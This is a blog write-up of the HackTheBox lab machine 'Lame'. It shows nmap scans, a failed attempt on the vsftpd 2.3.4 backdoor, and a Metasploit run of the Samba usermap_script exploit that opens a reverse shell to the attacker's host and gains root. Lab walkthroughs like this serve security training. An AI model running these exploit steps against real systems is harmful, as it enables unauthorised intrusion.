Booj thoughts on security
HackTheBox - Lame
This writeup details attacking the machine Lame (10.10.10.3) on HackTheBox.
Enumeration
First things first, as with any machine, we want to nmap scan it to see what ports are open.
root@kali:~/reboare.github.io/_posts# nmap -p- 10.10.10.3 -T4
Nmap scan report for 10.10.10.3
Host is up (0.062s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
Nmap done: 1 IP address (1 host up) scanned in 437.65 seconds
So we have a bunch of ports open, the next step is to perform a more in depth scan on these ports.
root@kali:~/reboare.github.io/_posts# nmap -p 21,22,139,445,3632 10.10.10.3 -A
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-08-21 12:21 BST
Nmap scan report for 10.10.10.3
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%), Linux 2.6.27 - 2.6.28 (92%), Linux 2.6.8 - 2.6.30 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2017-08-18T03:23:21-04:00
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 168.26 ms 10.10.14.1
2 251.04 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.89 seconds
THe first target that looks like it would be exploitable is the ftp server version, vsftpd 2.3.4. For those who don’t know, this version of vsftpd was compromised, not via the source code, but by an exploitable version being uploaded to the master site. Exploiting it is as simple as sending a smiley-face ‘:)’ as the username credential. This will then open a shell on port 6200.
However, a quick and dirty test reveals that this method doesn’t work.
root@kali:~# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): :)
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> exit
221 Goodbye.
root@kali:~# nmap -p 6200 10.10.10.3
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-08-21 12:26 BST
Nmap scan report for 10.10.10.3
Host is up (0.037s latency).
PORT STATE SERVICE
6200/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 0.83 seconds
Since there was no fix to the source code, fixing this vulnerability didn’t necessitate a version change. This was just placed as a red-herring.
So with that failing lets attempt to attack the samba service. We can see from the namp scan that it’s running version 3.0.20, so lets check metasploit to see if anything pops up.
msf > search samba
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
auxiliary/scanner/rsync/modules_list normal List Rsync Modules
auxiliary/scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution
exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent MS14-060 Microsoft Windows OLE Package Manager Code Execution
exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow
exploit/windows/smb/group_policy_startup 2015-01-26 manual Group Policy Script Execution From Shared Resource
post/linux/gather/enum_configs normal Linux Gather Configurations
Quite a few exploits for samba, but doing some research reveals that samba/usermap_script targets versions 3.0.20 through 3.0.25rc3. So lets try that one.
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 10.10.13.126
LHOST => 10.10.13.126
msf exploit(usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.13.126:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo g2J1cK9h6SBFE0RL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "g2J1cK9h6SBFE0RL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.13.126:4444 -> 10.10.10.3:50926) at 2017-05-17 17:31:24 +0100
It works and we have a root shell.
Written on August 20th, 2017 by Josiah BevertonFeel free to share!